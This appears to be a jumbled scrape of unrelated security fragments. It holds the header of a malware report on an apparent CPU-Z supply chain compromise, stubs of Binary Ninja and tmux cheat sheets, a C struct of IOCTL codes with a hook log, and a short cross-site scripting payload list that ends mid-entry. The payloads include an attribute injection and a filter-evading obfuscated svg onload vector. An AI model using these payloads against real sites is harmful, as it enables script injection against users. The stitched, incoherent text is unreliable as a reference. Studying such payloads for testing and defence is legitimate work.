beep boop mmssr

CPU-Z 2.19 Supply Chain Attack - Malware Analysis Report

Date: 2026-04-10 Analyst: nemesis Classification: Trojan / Backdoor (Alien RAT variant) Severity: CRITICAL Campaign ID: CityOfSin (extracted from C2 callback UTM parameters) Scope: CPUID official domain compromise affecting CPU-Z, HWMonitor, HWMonitor Pro, PerfMonitor 2, powerMAX + separately FileZilla Status: Breach confirmed and fixed by CPUID; site was compromised ~6 hours on April 9-10, 2026 CPUID Statement: "A secondary feature (a side API) was compromised for approximately six hours [...] causing the main website to randomly display malicious links. Our signed original files were not compromised."

Binary Ninja Python API Cheat Sheet

This is a work in progress by someone who is learning about Binary Ninja.

References

Metadata Details

Get database name

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname

	typedef struct _ioctl_t
	{
	const char* ioctl_name;
	uint64_t ctl_code;
	} ioctl_t;

	// This would likely be better used in some unordered map. This is just a temporary data structure for testing resolution.
	//
	// Results from NtDeviceIoControlFile hook:
	// utweb.exe (14916) :: NtDeviceIoControlFile( 0x65c (\Device\Afd), 0x694, 0x0000000000000000, 0x0000000000000000, 0x00000000044DEE90, 0x12024 (IOCTL_AFD_SELECT), 0x0000000004A3FC18, 0x34, 0x0000000004A3FC18, 0x34 )

	" onfocus="alert(1)" name="bounty
	(Append #bounty to the URL and enjoy your zero interaction XSS )

	<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//

	# Internet Explorer, Edge
	<svg><script>alert(1)<p>

	# Firefox